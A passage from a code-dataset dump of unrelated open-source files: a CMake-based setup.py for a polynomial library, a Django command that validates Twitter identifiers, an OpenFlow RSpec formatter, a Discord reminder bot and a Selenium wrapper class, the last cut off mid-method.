subprocess\nimport sys\nfrom pathlib import Path\nfrom setuptools import find_packages\nfrom setuptools import Extension, setup\nfrom setuptools.command.build_ext import build_ext\n\n# Convert distutils Windows platform specifiers to CMake -A arguments\nPLAT_TO_CMAKE = {\n \"win32\": \"Win32\",\n \"win-amd64\": \"x64\",\n \"win-arm32\": \"ARM\",\n \"win-arm64\": \"ARM64\",\n}\n\n# A CMakeExtension needs a sourcedir instead of a file list.\n# The name must be the _single_ output extension from the CMake build.\n# If you need multiple extensions, see scikit-build.\nclass CMakeExtension(Extension):\n def __init__(self, name: str, sourcedir: str = \"\") -> None:\n super().__init__(name, sources=[])\n self.sourcedir = os.fspath(Path(sourcedir).resolve())\n\n\n\nclass CMakeBuild(build_ext):\n def build_extension(self, ext):\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n\n # required for auto-detection & inclusion of auxiliary \"native\" libs\n if not extdir.endswith(os.path.sep):\n extdir += os.path.sep\n\n debug = int(os.environ.get(\"DEBUG\", 0)) if self.debug is None else self.debug\n cfg = \"Debug\" if debug else \"Release\"\n\n # CMake lets you override the generator - we need to check this.\n # Can be set with Conda-Build, for example.\n cmake_generator = os.environ.get(\"CMAKE_GENERATOR\", \"\")\n\n # Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON\n # EXAMPLE_VERSION_INFO shows you how to pass a value into the C++ code\n # from Python.\n cmake_args = [\n f\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={extdir}\",\n f\"-DPYTHON_EXECUTABLE={sys.executable}\",\n f\"-DCMAKE_BUILD_TYPE={cfg}\", # not used on MSVC, but no harm\n ]\n build_args = []\n # Adding CMake arguments set as environment variable\n # (needed e.g. to build for ARM OSx on conda-forge)\n if \"CMAKE_ARGS\" in os.environ:\n cmake_args += [item for item in os.environ[\"CMAKE_ARGS\"].split(\" \") if item]\n\n # In this example, we pass in the version to C++. You might not need to.\n cmake_args += [f\"-DEXAMPLE_VERSION_INFO={self.distribution.get_version()}\"]\n\n if self.compiler.compiler_type != \"msvc\":\n # Using Ninja-build since it a) is available as a wheel and b)\n # multithreads automatically. MSVC would require all variables be\n # exported for Ninja to pick it up, which is a little tricky to do.\n # Users can override the generator with CMAKE_GENERATOR in CMake\n # 3.15+.\n if not cmake_generator or cmake_generator == \"Ninja\":\n try:\n import ninja # noqa: F401\n\n ninja_executable_path = os.path.join(ninja.BIN_DIR, \"ninja\")\n cmake_args += [\n \"-GNinja\",\n f\"-DCMAKE_MAKE_PROGRAM:FILEPATH={ninja_executable_path}\",\n ]\n except ImportError:\n pass\n\n else:\n\n # Single config generators are handled \"normally\"\n single_config = any(x in cmake_generator for x in {\"NMake\", \"Ninja\"})\n\n # CMake allows an arch-in-generator style for backward compatibility\n contains_arch = any(x in cmake_generator for x in {\"ARM\", \"Win64\"})\n\n # Specify the arch if using MSVC generator, but only if it doesn't\n # contain a backward-compatibility arch spec already in the\n # generator name.\n if not single_config and not contains_arch:\n cmake_args += [\"-A\", PLAT_TO_CMAKE[self.plat_name]]\n\n # Multi-config generators have a different way to specify configs\n if not single_config:\n cmake_args += [\n f\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{cfg.upper()}={extdir}\"\n ]\n build_args += [\"--config\", cfg]\n\n if sys.platform.startswith(\"darwin\"):\n # Cross-compile support for macOS - respect ARCHFLAGS if set\n archs = re.findall(r\"-arch (\\S+)\", os.environ.get(\"ARCHFLAGS\", \"\"))\n if archs:\n cmake_args += [\"-DCMAKE_OSX_ARCHITECTURES={}\".format(\";\".join(archs))]\n\n # Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level\n # across all generators.\n if \"CMAKE_BUILD_PARALLEL_LEVEL\" not in os.environ:\n # self.parallel is a Python 3 only way to set parallel jobs by hand\n # using -j in the build_ext call, not supported by pip or PyPA-build.\n if hasattr(self, \"parallel\") and self.parallel:\n # CMake 3.12+ only.\n build_args += [f\"-j{self.parallel}\"]\n\n build_temp = os.path.join(self.build_temp, ext.name)\n if not os.path.exists(build_temp):\n os.makedirs(build_temp)\n\n subprocess.check_call([\"cmake\", ext.sourcedir] + cmake_args, cwd=build_temp)\n subprocess.check_call([\"cmake\", \"--build\", \".\"] + build_args, cwd=build_temp)\n\n\nsetup(\n name=\"pyElemSymPoly\",\n packages=find_packages(),\n version=\"0.1.14\",\n license=\"MIT\",\n #home_page=\"https://github.com/IshanHegde/ElemSymPoly\",\n install_requires=[\n \"numpy >= 1.19.2\"\n ],\n url= \"https://github.com/IshanHegde/ElemSymPoly\",\n description=\"Fast, arbitrary precision computation of Elementary Symmetric Polynomials.\",\n long_description = \"\"\"\n \n ElemSymPoly is a high-performance C library with Python bindings that utilizes the GNU MPFR Library for \n precise computation of Elementary Symmetric Polynomials and a custom FFT implimentation. \\n\n \n The Library is currently in development stage and not production ready. \\n\n \n The library is based on applying a divide and conquer approach to compute the elementary symmetric polynomials. \\n\n \n First, the elementary symmetric polynomials of order N is expressed as a product of N order 1 polynomials. \\n\n \n Next, using a divide and conquer approach, the product of N order 1 polynomials is computed by recursively. \\n\n \n After a certain arbitrary threshold (currently set to 8), the polynomials of order 8 or above are computed using FFT. \\n\n \n The FFT algorithm is a custom implementation of the classic recursive Cooley-Tukey FFT algorithm. \\n\n \n This algorithim has a time complexity of O( N log^2 N ) compared to the naive approach of O( N^2 ) and also has\n arbitrary precision support (currently up to 512 decimal places due to stack overflow concerns). \\n\n \n The library also has a Python wrapper for ease of use, and only relies on NumPy, GNU MPFR which in turn relies on\n GNU GMP, Python C headers, CMake, glibc and a C compiler (only tested with GCC). \\n\n \"\"\",\n ext_modules=[CMakeExtension('pyElemSymPoly')],\n cmdclass=dict(build_ext=CMakeBuild),\n zip_safe=False,\n python_requires=\">=3.8\",\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"Development Status :: 3 - Alpha\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: C\",\n \"Programming Language :: Python\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: 3.12\",\n ]\n\n)\n","repo_name":"IshanHegde/ElemSymPoly","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6507549636","text":"from django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom people.models import Person\nfrom twitterbot.helpers import TwitterBot\n\nfrom ..twitter import TwitterAPIData\n\nVERBOSE = False\n\n\ndef verbose(*args, **kwargs):\n if VERBOSE:\n print(*args, **kwargs)\n\n\nclass Command(BaseCommand):\n help = (\n \"Use the Twitter API to check / fix Twitter screen names and user IDs\"\n )\n\n def handle_person(self, person):\n twitter_identifiers = person.get_identifiers_of_type(\"twitter_username\")\n\n # If they have any Twitter user IDs, then check to see if we\n # need to update the screen name from that; if so, update\n # the screen name. Skip to the next person. This catches\n # people who have changed their Twitter screen name, or\n # anyone who had a user ID set but not a screen name\n # (which should be rare). If the user ID is not a valid\n # Twitter user ID, it is deleted.\n\n # TODO can forloop be removed? As twitter_identifiers should only be 1\n # due to unique_together constraint on PersonIdentifier model?\n for identifier in twitter_identifiers:\n screen_name = identifier.value or None\n user_id = identifier.internal_identifier\n if user_id:\n verbose(\n \"{person} has a Twitter user ID: {user_id}\".format(\n person=person, user_id=user_id\n )\n )\n\n if user_id not in self.twitter_data.user_id_to_screen_name:\n # user ID not in our list our prefertched twitter_data but\n # before we delete them do a check to see if they were\n # suspended\n if self.twitterbot.is_user_suspended(\n screen_name=screen_name\n ):\n # log the suspension but keep the identifier and move on\n verbose(\n f\"{person}'s Twitter account ({user_id}) is currently suspended.\"\n )\n self.twitterbot.handle_suspended(identifier=identifier)\n continue\n\n # otherwise we know to remove them\n print(\n \"Removing user ID {user_id} for {person_name} as it is not a valid Twitter user ID. {person_url}\".format(\n user_id=user_id,\n person_name=person.name,\n person_url=person.get_absolute_url(),\n )\n )\n self.twitterbot.save(\n person,\n msg=\"This Twitter user ID no longer exists; removing it \",\n )\n identifier.delete()\n continue\n\n correct_screen_name = self.twitter_data.user_id_to_screen_name[\n user_id\n ]\n if not screen_name or screen_name != correct_screen_name:\n msg = \"Correcting the screen name from {old_screen_name} to {correct_screen_name}\".format(\n old_screen_name=screen_name,\n correct_screen_name=correct_screen_name,\n )\n print(msg)\n identifier.value = correct_screen_name\n identifier.extra_data[\"status\"] = \"active\"\n identifier.save()\n self.twitterbot.save(person, msg)\n else:\n if identifier.extra_data.get(\"status\") != \"active\":\n identifier.extra_data[\"status\"] = \"active\"\n identifier.save()\n verbose(\n \"The screen name ({screen_name}) was already correct\".format(\n screen_name=screen_name\n )\n )\n\n # Otherwise, if they have a Twitter screen name (but no\n # user ID, since we already dealt with that case) then\n # find their Twitter user ID and set that as an identifier.\n # If the screen name is not a valid Twitter screen name, it\n # is deleted.\n elif screen_name:\n verbose(\n \"{person} has Twitter screen name ({screen_name}) but no user ID\".format(\n person=person, screen_name=screen_name\n )\n )\n\n if (\n screen_name.lower()\n not in self.twitter_data.screen_name_to_user_id\n ):\n # at this point we have a screen name stored but it is not\n # in the `twitter_data` with valid names and ID's so we do a\n # final check to see if the user is currently suspended\n # before removing\n if self.twitterbot.is_user_suspended(\n screen_name=screen_name\n ):\n # log the suspension and move on to the next one\n verbose(\n f\"{person}'s Twitter account ({screen_name}) is currently suspended.\"\n )\n self.twitterbot.handle_suspended(identifier=identifier)\n continue\n\n # otherwise we know the name is not valid so remove it\n print(\n \"Removing screen name {screen_name} for {person_name} as it is not a valid Twitter screen name. {person_url}\".format(\n screen_name=screen_name,\n person_name=person.name,\n person_url=person.get_absolute_url(),\n )\n )\n # TODO check should the object be deleted here?\n identifier.value = \"\"\n identifier.save()\n return\n\n print(\n \"Adding the user ID {user_id}\".format(\n user_id=self.twitter_data.screen_name_to_user_id[\n screen_name.lower()\n ]\n )\n )\n\n person.tmp_person_identifiers.update_or_create(\n person=person,\n value_type=\"twitter_username\",\n value=screen_name,\n defaults={\n \"internal_identifier\": self.twitter_data.screen_name_to_user_id[\n screen_name.lower()\n ],\n \"extra_data\": {\"status\": \"active\"},\n },\n )\n self.twitterbot.save(person)\n else:\n verbose(\n \"{person} had no Twitter account information\".format(\n person=person\n )\n )\n\n def handle(self, *args, **options):\n global VERBOSE\n VERBOSE = int(options[\"verbosity\"]) > 1\n self.twitterbot = TwitterBot()\n self.twitter_data = TwitterAPIData()\n self.twitter_data.update_from_api()\n # Now go through every person in the database and check their\n # Twitter details. This can take a long time, so use one\n # transaction per person.\n for person_id in Person.objects.order_by(\"name\").values_list(\n \"pk\", flat=True\n ):\n with transaction.atomic():\n # n.b. even though it's inefficient query-wise, we get\n # each person from the database based on their ID\n # within the transaction because the loop we're in\n # takes a long time, other otherwise we might end up\n # with out of date information (e.g. this has happened\n # with the person.versions field, with confusing\n # results...)\n person = Person.objects.get(pk=person_id)\n self.handle_person(person)\n","repo_name":"DemocracyClub/yournextrepresentative","sub_path":"ynr/apps/twitterbot/management/commands/twitterbot_update_usernames.py","file_name":"twitterbot_update_usernames.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"25217295805","text":"from rspecs.commons import DEFAULT_XMLNS, DEFAULT_XS, DEFAULT_SCHEMA_LOCATION,\\\n DSL_PREFIX\nfrom rspecs.commons_of import DEFAULT_OPENFLOW\nfrom rspecs.formatter_base import FormatterBase\nfrom lxml import etree\n\nDEFAULT_AD_SCHEMA_LOCATION = DEFAULT_SCHEMA_LOCATION\nDEFAULT_AD_SCHEMA_LOCATION += DSL_PREFIX + \"3/ad.xsd \"\nDEFAULT_AD_SCHEMA_LOCATION += DSL_PREFIX + \"ext/openflow/3/of-ad.xsd\"\n\n\nclass OFv3AdvertisementFormatter(FormatterBase):\n def __init__(self, xmlns=DEFAULT_XMLNS, xs=DEFAULT_XS,\n openflow=DEFAULT_OPENFLOW,\n schema_location=DEFAULT_AD_SCHEMA_LOCATION):\n super(OFv3AdvertisementFormatter, self).__init__(\n \"advertisement\", schema_location, {\"openflow\": \"%s\" % (openflow)},\n xmlns, xs)\n self.__of = openflow\n\n def add_datapath(self, rspec, dpath):\n d = etree.SubElement(rspec, \"{%s}datapath\" % (self.__of))\n d.attrib[\"component_id\"] = dpath.get(\"component_id\")\n d.attrib[\"component_manager_id\"] = dpath.get(\"component_manager_id\")\n d.attrib[\"dpid\"] = dpath.get(\"dpid\")\n\n for p in dpath.get('ports'):\n port = etree.SubElement(d, \"{%s}port\" % (self.__of))\n port.attrib[\"num\"] = p.get(\"num\")\n if p.get(\"name\") is not None:\n port.attrib[\"name\"] = p.get(\"name\")\n\n def datapath(self, dpath):\n self.add_datapath(self.rspec, dpath)\n\n def add_of_link(self, rspec, link):\n l = etree.SubElement(rspec, \"{%s}link\" % (self.__of))\n l.attrib[\"component_id\"] = link.get(\"component_id\")\n\n dpids_ = link.get(\"dpids\")\n ports_ = link.get(\"ports\")\n for i in range(len(dpids_)):\n dp = etree.SubElement(l, \"{%s}datapath\" % (self.__of))\n dp.attrib[\"component_id\"] = dpids_[i].get(\"component_id\")\n dp.attrib[\"component_manager_id\"] =\\\n dpids_[i].get(\"component_manager_id\")\n dp.attrib[\"dpid\"] = dpids_[i].get(\"dpid\")\n\n port = etree.SubElement(l, \"{%s}port\" % (self.__of))\n port.attrib[\"port_num\"] = ports_[i].get(\"port_num\")\n\n def of_link(self, link):\n self.add_of_link(self.rspec, link)\n\n def add_fed_link(self, rspec, link):\n l = etree.SubElement(rspec, \"{%s}link\" % (self.__of))\n l.attrib[\"component_id\"] = link.get(\"component_id\")\n\n ltype = etree.SubElement(l, \"{%s}link_type\" % (self.__of))\n ltype.attrib[\"name\"] = link.get(\"link_type_name\")\n\n cm = etree.SubElement(l, \"{%s}component_manager\" % (self.__of))\n cm.attrib[\"name\"] = link.get(\"component_manager_name\")\n\n for ifref in link.get(\"interface_ref_id\"):\n ref = etree.SubElement(l, \"{%s}interface_ref\" % (self.__of))\n ref.attrib[\"component_id\"] = ifref\n\n def fed_link(self, link):\n self.add_fed_link(self.rspec, link)\n","repo_name":"dana-i2cat/felix","sub_path":"modules/resource/utilities/rspecs/openflow/advertisement_formatter.py","file_name":"advertisement_formatter.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"24763476811","text":"import discord\nimport datetime\nfrom discord.ext import tasks\nimport sqlite3\nfrom sqlite3 import Error\nfrom datetime import datetime\nfrom os import getenv\n\nclient = discord.Client()\n\n\ndef create_database_connection(database_name):\n \"\"\" create a database connection to the SQLite database\n specified by db_file\n :param database_name: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(database_name)\n except Error as e:\n print(e)\n return conn\n\n\ndef query_database_for_reminders(current_time):\n \"\"\"\n Query reminders by datetime\n :param current_time:\n :return:\n \"\"\"\n conn = create_database_connection('reminders.db')\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM reminders WHERE datetime=?\", (current_time,))\n result = cur.fetchone()\n cur.execute(\"DELETE FROM reminders WHERE datetime=?\", (current_time,))\n conn.commit()\n return result\n\n\n@tasks.loop(seconds=20)\nasync def check_for_reminders():\n now = datetime.utcnow()\n current_time = f'{now.year},{now.month},{now.day},{now.hour},{now.minute}'\n reminders = query_database_for_reminders(current_time)\n if reminders:\n embed = discord.Embed(title=\"Link to submit forecast\", url=\"https://www.wxchallenge.com/submit_forecast.php\",\n description=\"Don't forget to submit your forecast! You have 30 more minutes.\",\n color=0xff2600)\n embed.set_author(name=\"WxChallenge Reminder\", url=\"https://www.wxchallenge.com/submit_forecast.php\",\n icon_url=\"https://www.wxchallenge.com/img/wxc_logo.png\")\n channel = client.get_channel(841145714726010920)\n await channel.send(embed=embed)\n\n\n@client.event\nasync def on_ready():\n check_for_reminders.start()\n\n\nclient.run(getenv('DISCORD_TOKEN'))\n","repo_name":"arian-nasr/WxChallengeDiscordReminderBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18234927429","text":"#coding:utf-8\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.support.select import Select\r\nfrom selenium.common.exceptions import *\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom case.happy_public.wang_logging import Log\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\n\r\nlog = Log()\r\nsuccess = \"SUCCESS \"\r\nfail = \"FAIL \"\r\nscreen_file = \"D:\\\\test\\\\happyHiiso3\\\\file\\\\\"\r\n\r\ndef Browser(browser='ff', remoteAddress=None):\r\n t1 = time.time()\r\n dc = {'platform': 'ANY', 'browserName': 'chrome', 'version': '', 'javascriptEnabled': True}\r\n dr = None\r\n if remoteAddress is None:\r\n if browser == \"firefox\" or browser == \"ff\":\r\n dr = webdriver.Firefox()\r\n elif browser == \"chrome\" or browser == \"Chrome\":\r\n dr = webdriver.Chrome()\r\n elif browser == \"internet explorer\" or browser == \"ie\":\r\n dr = webdriver.Ie()\r\n elif browser == \"opera\":\r\n dr = webdriver.Opera()\r\n elif browser == \"phantomjs\":\r\n dr = webdriver.PhantomJS()\r\n elif browser == \"edge\":\r\n dr = webdriver.Edge()\r\n else:\r\n if browser == \"RChrome\":\r\n dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n desired_capabilities=dc)\r\n elif browser == \"RIE\":\r\n dc['browserName'] = 'internet explorer'\r\n dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n desired_capabilities=dc)\r\n elif browser == \"RFirefox\":\r\n dc['browserName'] = 'firefox'\r\n dc['marionette'] = False\r\n dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n desired_capabilities=dc)\r\n try:\r\n driver = dr\r\n log.info(\"{0} Start a new browser: {1}, Spend {2} seconds\".format(success, browser, time.time() - t1))\r\n return driver\r\n except Exception:\r\n raise NameError(\"Not found {0} browser,You can enter 'ie','ff',\"\r\n \"'chrome','RChrome','RIe' or 'RFirefox'.\".format(browser))\r\n\r\n\r\nclass Wang(object):\r\n #基于原生的selenium 框架做了二次封装\r\n # def __init__(self, browser='ff', remoteAddress=None):\r\n # \"\"\"\r\n # remote consle:\r\n # dr = PySelenium('RChrome','127.0.0.1:8080')\r\n # \"\"\"\r\n # t1 = time.time()\r\n # dc = {'platform': 'ANY', 'browserName': 'chrome', 'version': '', 'javascriptEnabled': True}\r\n # dr = None\r\n # if remoteAddress is None:\r\n # if browser == \"firefox\" or browser == \"ff\":\r\n # dr = webdriver.Firefox()\r\n # elif browser == \"chrome\" or browser == \"Chrome\":\r\n # dr = webdriver.Chrome()\r\n # elif browser == \"internet explorer\" or browser == \"ie\":\r\n # dr = webdriver.Ie()\r\n # elif browser == \"opera\":\r\n # dr = webdriver.Opera()\r\n # elif browser == \"phantomjs\":\r\n # dr = webdriver.PhantomJS()\r\n # elif browser == \"edge\":\r\n # dr = webdriver.Edge()\r\n # else:\r\n # if browser == \"RChrome\":\r\n # dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n # desired_capabilities=dc)\r\n # elif browser == \"RIE\":\r\n # dc['browserName'] = 'internet explorer'\r\n # dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n # desired_capabilities=dc)\r\n # elif browser == \"RFirefox\":\r\n # dc['browserName'] = 'firefox'\r\n # dc['marionette'] = False\r\n # dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n # desired_capabilities=dc)\r\n # try:\r\n # self.driver = dr\r\n # self.my_print(\"{0} Start a new browser: {1}, Spend {2} seconds\".format(success,browser,time.time()-t1))\r\n # except Exception:\r\n # raise NameError(\"Not found {0} browser,You can enter 'ie','ff',\"\r\n # \"'chrome','RChrome','RIe' or 'RFirefox'.\".format( browser))\r\n def __init__(self, driver):\r\n self.driver = driver\r\n\r\n def my_print(self,msg):\r\n log.info(msg)\r\n\r\n def open(self,url,t='',timeout=10):\r\n '''\r\n 使用get打开url后,最大化窗口,判断title是否符合预期\r\n Usage:\r\n driver = Wang()\r\n driver.open(url,t='')\r\n\r\n '''\r\n t1 = time.time()\r\n try:\r\n self.driver.get(url)\r\n self.driver.maximize_window()\r\n self.my_print(\"{0} Navigated to {1}, Spend {2} seconds\".format(success, url, time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to load {1}, Spend {2} seconds\".format(fail, url, time.time() - t1))\r\n raise\r\n\r\n def max_window(self):\r\n '''\r\n Set browser window maximized.\r\n\r\n Usage:\r\n driver.max_window()\r\n '''\r\n t1 = time.time()\r\n self.driver.maximize_window()\r\n self.my_print(\"{0} Set browser window maximized, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def set_window(self, wide, high):\r\n '''\r\n Set browser window wide and high.\r\n\r\n Usage:\r\n driver.set_window(wide,high)\r\n '''\r\n t1 = time.time()\r\n self.driver.set_window_size(wide, high)\r\n self.my_print(\"{0} Set browser window wide: {1},high: {2}, Spend {3} seconds\".format(\r\n success,wide, high,time.time() - t1))\r\n\r\n def find_element(self,locator,timeout=10):\r\n '''\r\n 定位元素,参数locator是元祖类型\r\n Usage:\r\n locator = (\"id\",\"xxx\")\r\n driver.find_element(locator)\r\n\r\n by_id= \"id\"\r\n by_xpath = \"xpath\"\r\n by_link_text = \"link text\"\r\n by_partial_text = \"partial link text\"\r\n by_name = \"name\"\r\n by_tag_name = \"tag name\"\r\n by_class_name = \"class name\"\r\n by_css_selector = \"css selector\"\r\n\r\n '''\r\n try:\r\n element = WebDriverWait(self.driver,timeout,1).until(EC.presence_of_element_located(locator))\r\n return element\r\n except Exception:\r\n nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n self.driver.get_screenshot_as_file(screen_file+\"%s.jpg\"%nowTime)\r\n\r\n def find_elements(self,locator,timeout=10):\r\n #定位一组元素\r\n try:\r\n elements = WebDriverWait(self.driver,timeout,1).until(EC.presence_of_all_elements_located(locator))\r\n return elements\r\n except Exception:\r\n nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n self.driver.get_screenshot_as_file(screen_file+\"%s.jpg\"%nowTime)\r\n\r\n def send_keys(self,locator,text):\r\n '''\r\n Operation input box.\r\n Usage:\r\n locator = (\"id\", \"xxx\")\r\n driver.send_keys(locator,text)\r\n '''\r\n # el = self.find_element(locator)\r\n # el.send_keys(text)\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n el.send_keys(text)\r\n self.my_print(\"{0} Typed element: <{1}> content: {2}, Spend {3} seconds\".format(success,\r\n locator, text,\r\n time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to type element: <{1}> content: {2}, Spend {3} seconds\".format(fail,\r\n locator, text,\r\n time.time() - t1))\r\n raise\r\n\r\n def clear_send_keys(self, locator, text):\r\n \"\"\"\r\n Clear and input element.\r\n\r\n Usage:\r\n driver.clear_type((\"id\", \"kw\"),\"selenium\")\r\n \"\"\"\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n el.clear()\r\n el.send_keys(text)\r\n self.my_print(\"{0} Clear and type element: <{1}> content: {2}, Spend {3} seconds\".format(success,\r\n locator, text,time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to clear and type element: <{1}> content: {2}, Spend {3} seconds\".format(fail,\r\n locator, text,time.time() - t1))\r\n raise\r\n\r\n def send_keys_and_enter(self, locator, text, secs=0.5):\r\n \"\"\"\r\n Operation input box. 1、input message,sleep 0.5s;2、input ENTER.\r\n\r\n Usage:\r\n driver.type_css_keys(('id','kw'),'beck')\r\n \"\"\"\r\n t1 = time.time()\r\n try:\r\n ele = self.find_element(locator)\r\n ele.send_keys(text)\r\n time.sleep(secs)\r\n ele.send_keys(Keys.ENTER)\r\n self.my_print(\"{0} Element <{1}> type content: {2},and sleep {3} seconds,input ENTER key, Spend {4} seconds\".format(\r\n success,locator,text,secs,time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable element <{1}> type content: {2},and sleep {3} seconds,input ENTER key, Spend {4} seconds\".\r\n format(fail, locator, text, secs, time.time() - t1))\r\n raise\r\n\r\n def click(self,locator):\r\n '''\r\n 点击操作\r\n Usage:\r\n locator(\"id\",\"xxx\")\r\n driver.click(locator)\r\n '''\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n el.click()\r\n self.my_print(\"{0} Clicked element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to click element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def right_click(self,locator):\r\n '''\r\n Right click element.\r\n 鼠标右击\r\n Usage:\r\n driver.right_click((\"id\",\"kw\"))\r\n '''\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n ActionChains(self.driver).context_click(el).perform()\r\n self.my_print(\"{0} Right click element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n except Exception:\r\n self.my_print(\r\n \"{0} Unable to right click element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def double_click(self, locator):\r\n '''\r\n Double click element.\r\n\r\n Usage:\r\n driver.double_click((\"id\",\"kw\"))\r\n '''\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n ActionChains(self.driver).double_click(el).perform()\r\n self.my_print(\"{0} Double click element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n except Exception:\r\n self.my_print(\r\n \"{0} Unable to double click element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def drag_and_drop(self, locator, target_locator):\r\n '''\r\n Drags an element a certain distance and then drops it.\r\n 鼠标拖动\r\n Usage:\r\n driver.drag_and_drop((\"id\",\"kw\"),(\"id2\",\"kw2\"))\r\n '''\r\n t1 = time.time()\r\n try:\r\n element = self.find_element(locator)\r\n target = self.find_element(target_locator)\r\n ActionChains(self.driver).drag_and_drop(element, target).perform()\r\n self.my_print(\"{0} Drag and drop element: <{1}> to element: <{2}>, Spend {3} seconds\".format(success,\r\n locator, target_locator,\r\n time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to drag and drop element: <{1}> to element: <{2}>, Spend {3} seconds\".format(fail,\r\n locator,\r\n target_locator,\r\n time.time() - t1))\r\n raise\r\n\r\n def submit(self, locator):\r\n '''\r\n Submit the specified form.\r\n\r\n Usage:\r\n driver.submit((\"id\",\"kw\"))\r\n '''\r\n t1 = time.time()\r\n try:\r\n el = self.find_element(locator)\r\n el.submit()\r\n self.my_print(\r\n \"{0} Submit form args element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n except Exception:\r\n self.my_print(\r\n \"{0} Unable to submit form args element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def F5(self):\r\n '''\r\n Refresh the current page.\r\n\r\n Usage:\r\n driver.F5()\r\n '''\r\n t1 = time\r\n self.driver.refresh()\r\n self.my_print(\"{0} Refresh the current page, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def is_element_exist(self, locator):\r\n \"\"\"\r\n judge element is exist,The return result is true or false.\r\n\r\n Usage:\r\n driver.element_exist((\"id\",\"kw\"))\r\n \"\"\"\r\n t1 = time.time()\r\n try:\r\n self.driver.find_element(locator)\r\n self.my_print(\"{0} Element: <{1}> is exist, Spend {2} seconds\".format(success,locator, time.time() - t1))\r\n return True\r\n except TimeoutException:\r\n self.my_print(\"{0} Element: <{1}> is not exist, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n return False\r\n\r\n def is_text_in_element(self,locator,text,timeout=10):\r\n '''\r\n 判断文本是否在元素里,返回判断结果布尔值\r\n usage:\r\n locator=(id\", \"xxx\")\r\n text = \"\"\r\n result = driver.is_text_in_element(locator,text)\r\n '''\r\n try:\r\n result = WebDriverWait(self.driver,timeout,1).until(EC.text_to_be_present_in_element(locator,text))\r\n except TimeoutException:\r\n print(\"元素没定位到:\"+str(locator))\r\n nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n self.driver.get_screenshot_as_file(screen_file + \"%s.jpg\" % nowTime)\r\n return False\r\n else:\r\n return result\r\n\r\n def is_value_in_element(self,locator,value,timeout=10):\r\n '''\r\n 判断value值是否在元素里,返回判断结果布尔值\r\n usage:\r\n locator=(id\", \"xxx\")\r\n value =\r\n result = driver.is_value_in_element(locator,text)\r\n '''\r\n try:\r\n result = WebDriverWait(self.driver,timeout,1).until(EC.text_to_be_present_in_element_value(locator,value))\r\n except TimeoutException:\r\n print(\"元素没定位到:\"+str(locator))\r\n nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n self.driver.get_screenshot_as_file(screen_file + \"%s.jpg\" % nowTime)\r\n return False\r\n else:\r\n return result\r\n\r\n def is_title(self,title,timeout=10):\r\n # 判断title是否等于driver.title\r\n result = 